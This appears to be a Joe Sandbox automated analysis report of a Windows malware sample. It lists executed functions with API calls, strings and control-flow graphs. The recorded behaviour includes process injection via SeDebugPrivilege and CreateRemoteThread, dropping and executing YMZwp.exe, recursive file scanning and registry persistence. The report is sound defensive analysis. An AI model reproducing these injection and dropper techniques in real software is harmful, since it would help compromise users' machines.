42555 24abe41 ExitProcess 42554->42555 42556 428599 42559 432ed0 42556->42559 42564 42c860 42559->42564 42561 4285a5 42562 432eff 42562->42561 42576 410ef0 42562->42576 42565 42c875 42564->42565 42575 42c933 42564->42575 42566 42c890 42565->42566 42569 42c8a9 42565->42569 42589 42ac90 131 API calls 42566->42589 42568 42c89f 42568->42562 42570 42c8d6 42569->42570 42573 42c8ef 42569->42573 42590 42ac90 131 API calls 42570->42590 42572 42c8e5 42572->42562 42573->42575 42591 42ac90 131 API calls 42573->42591 42575->42562 42592 413ac0 42576->42592 42578 410f01 GetWindowRect GetParent 42594 4bdeb6 42578->42594 42581 4c0722 GetWindowLongA 42582 410f36 42581->42582 42587 410f49 EqualRect 42582->42587 42601 4c2cea GetWindowLongA ScreenToClient ScreenToClient 42582->42601 42585 411002 42585->42561 42586 410fdf 42588 4c07fa MoveWindow 42586->42588 42587->42585 42587->42586 42588->42585 42589->42568 42590->42572 42591->42575 42593 413ad5 42592->42593 42593->42578 42602 4bde44 42594->42602 42596 4bdebf 42597 4c1f2c 30 API calls 42596->42597 42598 4bdecc 42597->42598 42610 4c0914 42598->42610 42600 410f29 42600->42581 42600->42587 42601->42587 42603 4bde4e __EH_prolog 42602->42603 42604 4c5a94 28 API calls 42603->42604 42606 4bde54 42604->42606 42605 4bde92 42605->42596 42606->42605 42607 4bc1f4 29 API calls 42606->42607 42608 4bde76 42607->42608 42608->42605 42614 4c1ec7 29 API calls __EH_prolog 42608->42614 42611 4c091b 42610->42611 42613 4c0937 42610->42613 42612 4c0921 GetParent 42611->42612 42611->42613 42612->42613 42613->42600 42614->42605

                                    Executed Functions

                                    Function 02429652 Relevance: 93.0, APIs: 40, Strings: 12, Instructions: 1977stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 024213E8: InterlockedExchange.KERNEL32(024340B8,?), ref: 02421406
                                    • lstrcpy.KERNEL32(00000000,?), ref: 024299C1
                                    • CharUpperA.USER32(00000000), ref: 024299CE
                                      • Part of subcall function 024242C7: tolower.MSVCRT ref: 0242431E
                                      • Part of subcall function 024242C7: tolower.MSVCRT ref: 02424330
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: tolower$CharExchangeInterlockedUpperlstrcpy
                                    • String ID: .adata$2$CreateFileA$CreateFileW$GetProcAddress$M$$OpenFile$P$PE$_lopen$d$d
                                    • API String ID: 515353746-2557192021
                                    • Opcode ID: 8aea6bfbfe5949e1f1a69e2937679561878b3ee3c7526144ffdf4afcecfe5be1
                                    • Instruction ID: 0e320bf42ca22a2dfe995a8792786483d4d14778d8cb03e10e671ab4a0a07f11
                                    • Opcode Fuzzy Hash: 8aea6bfbfe5949e1f1a69e2937679561878b3ee3c7526144ffdf4afcecfe5be1
                                    • Instruction Fuzzy Hash: 20233AB1D01628DFDB24CF55CC84BE9B7B6BF84305F5481EAE50AAB280D7319A89CF54
                                    Function 0242CC92 Relevance: 75.6, APIs: 38, Strings: 5, Instructions: 382memorythreadCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 537 242cc92-242cd90 call 2433600 OpenProcess 540 242cf43-242cf5b OpenProcessToken 537->540 541 242cd96-242cd9f GetLastError 537->541 542 242cf69-242cf85 GetTokenInformation 540->542 543 242cf5d-242cf64 540->543 544 242cf37-242cf3e 541->544 545 242cda5-242cddc GetVersionExA 541->545 549 242cf93-242cf9c GetLastError 542->549 550 242cf87-242cf8e 542->550 546 242d247-242d24e 543->546 544->546 547 242cdea-242ce0e GetCurrentThread OpenThreadToken 545->547 548 242cdde-242cde5 545->548 555 242d250-242d25d FindCloseChangeNotification 546->555 556 242d267-242d26e 546->556 551 242ce10-242ce1b GetLastError 547->551 552 242ce4f-242ce9f LookupPrivilegeValueA AdjustTokenPrivileges 547->552 548->546 553 242cfaa-242cfcd GetProcessHeap RtlAllocateHeap 549->553 554 242cf9e-242cfa5 549->554 550->546 559 242ce29-242ce41 GetCurrentProcess OpenProcessToken 551->559 560 242ce1d-242ce24 551->560 563 242cea1-242ceb5 CloseHandle 552->563 564 242ceba-242cec5 GetLastError 552->564 561 242cfdb-242d001 GetTokenInformation 553->561 562 242cfcf-242cfd6 553->562 554->546 555->556 557 242d270-242d277 CloseHandle 556->557 558 242d27d-242d284 556->558 557->558 565 242d286-242d296 GetProcessHeap HeapFree 558->565 566 242d29c-242d2af 558->566 559->552 567 242ce43-242ce4a 559->567 560->546 568 242d003-242d00a 561->568 569 242d00f-242d055 LookupAccountSidA 561->569 562->546 563->546 570 242cee0-242cf27 OpenProcess AdjustTokenPrivileges FindCloseChangeNotification 564->570 571 242cec7-242cedb CloseHandle 564->571 565->566 567->546 568->546 574 242d063-242d06c 569->574 575 242d057-242d05e 569->575 572 242cf35 570->572 573 242cf29-242cf30 570->573 571->546 572->540 573->546 576 242d06e-242d082 lstrcmpiA 574->576 577 242d0cc-242d0d3 574->577 575->546 578 242d0b0-242d0c5 CreateMutexA 576->578 579 242d084-242d098 lstrcmpiA 576->579 577->546 578->546 579->578 580 242d09a-242d0ae lstrcmpiA 579->580 580->578 581 242d0ca-242d100 VirtualAllocEx 580->581 583 242d102-242d126 WriteProcessMemory 581->583 584 242d169-242d191 VirtualAllocEx 581->584 585 242d134-242d154 CreateRemoteThread 583->585 586 242d128-242d12f 583->586 587 242d197-242d1f1 call 2432ceb lstrlen call 2432ceb WriteProcessMemory 584->587 588 242d22e-242d235 584->588 589 242d162 585->589 590 242d156-242d15d 585->590 586->546 595 242d1f3-242d1fa 587->595 596 242d1fc-242d21c CreateRemoteThread 587->596 588->546 589->584 590->546 595->546 597 242d227 596->597 598 242d21e-242d225 596->598 597->588 598->546
                                    APIs
                                    • OpenProcess.KERNEL32(001F0FFF,00000000,0000000A), ref: 0242CD7D
                                    • GetLastError.KERNEL32 ref: 0242CD96
                                    • GetVersionExA.KERNEL32(00000094), ref: 0242CDCF
                                    • GetCurrentThread.KERNEL32 ref: 0242CDFF
                                    • OpenThreadToken.ADVAPI32(00000000), ref: 0242CE06
                                    • GetLastError.KERNEL32 ref: 0242CE10
                                    • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 0242CF53
                                    • FindCloseChangeNotification.KERNEL32(00000000), ref: 0242D257
                                    • CloseHandle.KERNEL32(?), ref: 0242D277
                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0242D28F
                                    • HeapFree.KERNEL32(00000000), ref: 0242D296
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: OpenProcess$CloseErrorHeapLastThreadToken$ChangeCurrentFindFreeHandleNotificationVersion
                                    • String ID: P$SeDebugPrivilege$local service$network service$system
                                    • API String ID: 134594290-3830299594
                                    • Opcode ID: c45c7f31fa829edd3cc811f1ea8db2eb2211746327a9090573e3317cfee0bbce
                                    • Instruction ID: 86a63fd8b7fa76049bc425be7fb144768de2b365879258351e16a1806c366d3b
                                    • Opcode Fuzzy Hash: c45c7f31fa829edd3cc811f1ea8db2eb2211746327a9090573e3317cfee0bbce
                                    • Instruction Fuzzy Hash: 0FF16F70D40228EBEB24CFA5DC49BEE7B74FB48714F50469AE615AB2C0C7B49A85CF50
                                    Function 0242D2B0 Relevance: 45.7, APIs: 24, Strings: 2, Instructions: 153stringsynchronizationprocessCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0242D2E1
                                    • Process32First.KERNEL32(00000000,00000128), ref: 0242D320
                                    • lstrlen.KERNEL32(?), ref: 0242D341
                                    • lstrcpyn.KERNEL32(00000000,?,00000040), ref: 0242D35C
                                    • lstrcpy.KERNEL32(00000000,?), ref: 0242D372
                                    • CharLowerA.USER32(00000000), ref: 0242D37F
                                    • lstrlen.KERNEL32(00000000,M_%d_,0000000A), ref: 0242D398
                                    • wsprintfA.USER32 ref: 0242D3A6
                                    • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 0242D3BA
                                    • GetLastError.KERNEL32 ref: 0242D3C6
                                    • ReleaseMutex.KERNEL32(?), ref: 0242D3D9
                                    • CloseHandle.KERNEL32(?), ref: 0242D3E6
                                    • Process32Next.KERNEL32(00000000,00000128), ref: 0242D419
                                    • lstrlen.KERNEL32(?,00000000,00000128), ref: 0242D43A
                                    • lstrcpyn.KERNEL32(00000000,?,00000040), ref: 0242D455
                                    • lstrcpy.KERNEL32(00000000,?), ref: 0242D46B
                                    • CharLowerA.USER32(00000000), ref: 0242D478
                                    • lstrlen.KERNEL32(00000000,M_%d_,0000000A), ref: 0242D491
                                    • wsprintfA.USER32 ref: 0242D49F
                                    • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 0242D4B3
                                    • GetLastError.KERNEL32 ref: 0242D4BF
                                    • ReleaseMutex.KERNEL32(?), ref: 0242D4D2
                                    • FindCloseChangeNotification.KERNEL32(?), ref: 0242D4DF
                                    • CloseHandle.KERNEL32(00000000), ref: 0242D510
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Mutexlstrlen$CloseCreate$CharErrorHandleLastLowerProcess32Releaselstrcpylstrcpynwsprintf$ChangeFindFirstNextNotificationSnapshotToolhelp32
                                    • String ID: M_%d_$M_%d_
                                    • API String ID: 3644635855-485321427
                                    • Opcode ID: 1d8466dd08a4380e17fedcec569fd74076c9ffd6c3a9cf58dce2285148a7c5a8
                                    • Instruction ID: c52698b4414744c747145d0e52036c37679f832afa40a57eefec840893905f12
                                    • Opcode Fuzzy Hash: 1d8466dd08a4380e17fedcec569fd74076c9ffd6c3a9cf58dce2285148a7c5a8
                                    • Instruction Fuzzy Hash: 0F5172B5D40228DBDB28DF60DC8CBDE7778BB58301F4089D9E249A6140DBB99AD8CF50
                                    Function 0242BADD Relevance: 38.8, APIs: 20, Strings: 2, Instructions: 264stringsleepfileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 755 242badd-242bb6a Sleep 756 242bb84-242bbb8 lstrcpy CharLowerA call 24242c7 755->756 757 242bb6c-242bb81 lstrcat 755->757 760 242bbd6-242bc00 lstrcat FindFirstFileA 756->760 761 242bbba-242bbd1 756->761 757->756 763 242bc06-242bc19 FindNextFileA 760->763 764 242be3c-242be5c 760->764 762 242be78-242be88 761->762 763->764 765 242bc1f-242bc29 763->765 769 242be6b-242be76 Sleep 764->769 770 242be5e-242be65 FindClose 764->770 767 242bc2b 765->767 768 242bc2d-242bc36 765->768 767->763 771 242bc38 768->771 772 242bc3d-242bc44 768->772 769->762 770->769 771->764 773 242bc46-242bc67 Sleep 772->773 774 242bc6d-242bc85 lstrlen 772->774 773->774 775 242bc87-242bc96 774->775 776 242bc9b-242bce2 lstrcat lstrlen CharUpperA lstrlen 774->776 775->763 777 242bd78-242bd8b 776->777 778 242bce8-242bcfe lstrcmpiA 776->778 779 242bd91-242bd9b 777->779 780 242be28-242be37 777->780 781 242bd00-242bd15 lstrcmpiA 778->781 782 242bd17-242bd1e 778->782 779->780 783 242bda1-242bdf2 lstrcpy lstrlen lstrcmpiA 779->783 780->763 781->777 781->782 784 242bd29-242bd38 782->784 785 242bdf4-242be04 call 242badd 783->785 786 242be0c-242be25 783->786 787 242bd3a-242bd56 call 24242c7 784->787 788 242bd68-242bd75 call 2429652 784->788 793 242be09 785->793 786->780 795 242bd66 787->795 796 242bd58-242bd63 call 2425719 787->796 788->777 793->786 795->784 796->795
                                    APIs
                                    • Sleep.KERNEL32(?,?,?,?,00000000,02433630,024A0240,000000FF,?,0242CB1B,00000003,00000000,00000000,00000000), ref: 0242BB57
                                    • lstrcat.KERNEL32(?,024A5658), ref: 0242BB75
                                    • lstrcpy.KERNEL32(00000000,?), ref: 0242BB8F
                                    • CharLowerA.USER32(00000000,?,?,00000000,02433630,024A0240,000000FF,?,0242CB1B,00000003,00000000,00000000,00000000), ref: 0242BB9C
                                    • lstrcat.KERNEL32(?,024A565C), ref: 0242BBDF
                                    • FindFirstFileA.KERNEL32(?,?), ref: 0242BBED
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0242BC11
                                    • Sleep.KERNEL32(?), ref: 0242BC67
                                    • lstrlen.KERNEL32(?), ref: 0242BC74
                                    • lstrcat.KERNEL32(?,?), ref: 0242BCAF
                                    • lstrlen.KERNEL32(?), ref: 0242BCB9
                                    • CharUpperA.USER32(?), ref: 0242BCCC
                                    • lstrlen.KERNEL32(?), ref: 0242BCD9
                                    • lstrcmpiA.KERNEL32(?,024A4044), ref: 0242BCF6
                                    • lstrcmpiA.KERNEL32(?,024A404C), ref: 0242BD0D
                                    • lstrcpy.KERNEL32(?,?), ref: 0242BDAF
                                    • lstrlen.KERNEL32(?), ref: 0242BDBC
                                    • lstrcmpiA.KERNEL32(?,024A3F68), ref: 0242BDEA
                                    • FindClose.KERNEL32(00000000), ref: 0242BE65
                                    • Sleep.KERNEL32(00000400), ref: 0242BE70
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$FindSleeplstrcatlstrcmpi$CharFilelstrcpy$CloseFirstLowerNextUpper
                                    • String ID: c:\windows$d
                                    • API String ID: 4181266269-1584695526
                                    • Opcode ID: 3686231c38883abb036bf2a264e680f164cd3a85d33988d28215730d2d240148
                                    • Instruction ID: 9f8a2b96c20a1da2fd03447fcb76dc86a0e1de5d182f8add332059b45a5d8679
                                    • Opcode Fuzzy Hash: 3686231c38883abb036bf2a264e680f164cd3a85d33988d28215730d2d240148
                                    • Instruction Fuzzy Hash: E9B1DCB1A00219ABCB14CF69D884BAF7BB5FF48308F448559F91A9B380C735E955CF64
                                    Function 00638044 Relevance: 31.7, APIs: 3, Strings: 15, Instructions: 171fileprocessCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 870 638044-638074 GetPEB 871 638077-63809a 870->871 872 63809d-6380a0 871->872 873 6380a6-6380bc 872->873 874 6381ee-63822b CreateFileA 872->874 875 638110-638116 873->875 876 6380be-6380c5 873->876 895 638265-638269 874->895 896 63822d-638230 874->896 879 638129-63812f 875->879 880 638118-63811f 875->880 876->875 877 6380c7-6380ce 876->877 877->875 881 6380d0-6380d7 877->881 883 638131-638138 879->883 884 638148-63814e 879->884 880->879 882 638121-638124 880->882 881->875 885 6380d9-6380dd 881->885 887 6381bb-6381c0 882->887 883->884 888 63813a-638141 883->888 889 638150-638157 884->889 890 638167-63816f 884->890 885->875 892 6380df-6380e3 885->892 898 6381c2-6381c5 887->898 899 6381e0-6381e9 887->899 888->884 897 638143-638146 888->897 889->890 891 638159-638160 889->891 893 638171-638178 890->893 894 638188-63818e 890->894 891->890 900 638162-638165 891->900 892->887 901 6380e9-63810b 892->901 893->894 902 63817a-638181 893->902 903 638190-638197 894->903 904 6381a7-6381ad 894->904 905 638232-638238 896->905 897->887 898->899 906 6381c7-6381ca 898->906 899->872 900->887 901->871 902->894 908 638183-638186 902->908 903->904 909 638199-6381a0 903->909 904->887 910 6381af-6381b6 904->910 911 638246-638252 WriteFile 905->911 912 63823a-638242 905->912 906->899 907 6381cc-6381cf 906->907 907->899 913 6381d1-6381d4 907->913 908->887 909->904 915 6381a2-6381a5 909->915 910->887 916 6381b8 910->916 918 638255-638262 WinExec 911->918 912->905 917 638244 912->917 913->899 919 6381d6-6381d9 913->919 915->887 916->887 917->918 918->895 919->899 921 6381db-6381de 919->921 921->874 921->899
                                    APIs
                                    • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00638223
                                    • WriteFile.KERNEL32(00000000,FFFEB9FF,00003E00,?,00000000), ref: 00638252
                                    • WinExec.KERNEL32(?,00000005), ref: 00638262
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: File$CreateExecWrite
                                    • String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$YMZwp.exe$athA$catA$dleA$el32$lstr$odul
                                    • API String ID: 2079927699-3592004379
                                    • Opcode ID: a4a7d50350bcf6bbadc83348cfe9d402c2e46aeacb26654bc9494282439f8a06
                                    • Instruction ID: 34550988311396a5c68e45a9ae591356fc6219e4388e6dd7ed96d0d3c320c7ae
                                    • Opcode Fuzzy Hash: a4a7d50350bcf6bbadc83348cfe9d402c2e46aeacb26654bc9494282439f8a06
                                    • Instruction Fuzzy Hash: 71610675D012169FCF24CF94C884AEEB7B2BB44315F2586AAE505AB701CB749E82CBD1
                                    Function 024257A0 Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 141stringsleepfileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 922 24257a0-2425830 GetTempPathA lstrlen 923 2425832-242583e lstrcat 922->923 924 2425844-242584b 922->924 923->924 925 2425851-24258c1 lstrlen lstrcpy lstrcat call 2421000 FindFirstFileA 924->925 926 24259cf-24259db RtlExitUserThread 924->926 929 24258c7-24258dd FindNextFileA 925->929 930 24259a9-24259b0 925->930 929->930 933 24258e3-2425928 lstrcat lstrlen * 2 929->933 931 24259b2-24259b9 FindClose 930->931 932 24259bf-24259ca Sleep 930->932 931->932 932->924 934 2425957-2425962 933->934 935 242592a-2425944 lstrcmpiA 933->935 937 2425964-242596e 934->937 938 2425999-24259a4 Sleep 934->938 935->934 936 2425946-242594f call 2425719 935->936 942 2425954 936->942 937->938 940 2425970-2425988 lstrcmpiA 937->940 938->929 940->938 941 242598a-2425996 call 2425758 940->941 941->938 942->934
                                    APIs
                                    • GetTempPathA.KERNEL32(00000100,00000000), ref: 02425812
                                    • lstrlen.KERNEL32(00000000), ref: 0242581F
                                    • lstrcat.KERNEL32(00000000,024A55E0), ref: 0242583E
                                    • lstrlen.KERNEL32(00000000), ref: 02425858
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02425872
                                    • lstrcat.KERNEL32(00000000,024A55E4), ref: 02425884
                                    • FindFirstFileA.KERNEL32(00000000,00000000), ref: 024258AE
                                    • FindNextFileA.KERNELBASE(000000FF,00000000), ref: 024258D5
                                    • lstrcat.KERNEL32(00000000,?), ref: 024258FF
                                    • lstrlen.KERNEL32(00000000), ref: 0242590C
                                    • lstrlen.KERNEL32(?), ref: 0242591F
                                    • lstrcmpiA.KERNEL32(00000000,024A4044), ref: 0242593C
                                    • lstrcmpiA.KERNEL32(00000000,_Rar), ref: 02425980
                                    • Sleep.KERNEL32(00000100), ref: 0242599E
                                    • FindClose.KERNEL32(00000000), ref: 024259B9
                                    • Sleep.KERNEL32(000927C0), ref: 024259C4
                                    • RtlExitUserThread.NTDLL(00000000), ref: 024259D1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$Findlstrcat$FileSleeplstrcmpi$CloseExitFirstNextPathTempThreadUserlstrcpy
                                    • String ID: _Rar
                                    • API String ID: 3155258034-536834240
                                    • Opcode ID: 466747d5eec1ab7ee24dd752fa5b59b0d58fb9532d5358bc723f25322ca980a8
                                    • Instruction ID: 8bb4056e8b0b1e36797b75c09bd3a61ba70fe2f56397f608e4cccb225af45be7
                                    • Opcode Fuzzy Hash: 466747d5eec1ab7ee24dd752fa5b59b0d58fb9532d5358bc723f25322ca980a8
                                    • Instruction Fuzzy Hash: 9251E871D402289FDB29CB60DC48BEF7B79AB4430AF8005E9E20DA6140DB75ABD8CF50
                                    Function 0242F760 Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 303stringregistryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 945 242f760-242f7ef 946 242f7f1-242f7fb 945->946 947 242f7fd 945->947 946->947 948 242f802-242f850 lstrcpy GetUserNameA call 2432ceb lstrlen 946->948 949 242fcdb-242fce0 947->949 952 242f852-242f860 lstrcat 948->952 953 242f866-242f870 948->953 952->953 954 242f881-242f894 lstrlen 953->954 955 242f896-242f8da lstrlen 954->955 956 242f8dc-242f8fe RegOpenKeyExA 954->956 955->954 958 242f900-242f904 956->958 959 242f92d-242f931 956->959 960 242f906 958->960 961 242f90b-242f926 RegCreateKeyA 958->961 962 242f937-242f941 959->962 963 242fb29-242fb60 959->963 960->949 961->959 965 242f928 961->965 966 242f94b-242f977 RegEnumValueA 962->966 967 242fb66-242fb70 963->967 968 242fcc5-242fccc 963->968 965->949 969 242f979-242f982 966->969 970 242f9ad-242f9db 966->970 967->968 972 242fb76-242fba1 967->972 968->949 971 242fcce-242fcd5 RegCloseKey 968->971 973 242f986-242f9ab RegDeleteValueA 969->973 974 242f984 969->974 977 242f9e1-242f9f3 970->977 978 242fb24 970->978 971->949 979 242fcb3-242fcb9 972->979 980 242fba7-242fc0e wsprintfA RegQueryValueExA 972->980 973->966 974->970 981 242fa11 977->981 982 242f9f5-242fa03 977->982 978->968 979->968 984 242fc10-242fc1a 980->984 985 242fc1f-242fc5c 980->985 981->978 982->981 983 242fa05-242fa0f 982->983 983->981 986 242fa16-242fa20 983->986 984->979 987 242fcae 985->987 988 242fc5e-242fc64 985->988 989 242fa31-242fa38 986->989 987->979 990 242fc6b-242fc79 988->990 991 242fc7b-242fc8c 988->991 992 242fc8e-242fc9d 988->992 993 242fc9f-242fcab 988->993 994 242fa3e-242fa8b wsprintfA 989->994 995 242fb1f 989->995 990->987 991->987 992->987 993->987 996 242fade-242fb1a RegSetValueExA 994->996 997 242fa8d-242fa93 994->997 995->978 1002 242fa22-242fa2b 996->1002 997->990 997->991 997->992 997->993 998 242fa9a-242faa8 997->998 999 242faaa-242fabc 997->999 1000 242fabe-242facd 997->1000 1001 242facf-242fad8 997->1001 998->996 999->996 1000->996 1001->996 1002->989
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,Software\), ref: 0242F80E
                                    • GetUserNameA.ADVAPI32(00000000,00000104), ref: 0242F822
                                    • lstrlen.KERNEL32(00000000), ref: 0242F847
                                    • lstrcat.KERNEL32(00000000,024A3CBC), ref: 0242F860
                                    • lstrlen.KERNEL32(00000000), ref: 0242F888
                                    • lstrlen.KERNEL32(00000000), ref: 0242F8CD
                                    • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,000F003F,00000000), ref: 0242F8F6
                                    • RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 0242F91E
                                    • RegEnumValueA.KERNEL32(00000000,00000000,00000000,00000104,00000000,00000000,00000000,00000000), ref: 0242F96F
                                    • RegCloseKey.KERNEL32(00000000), ref: 0242FCD5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
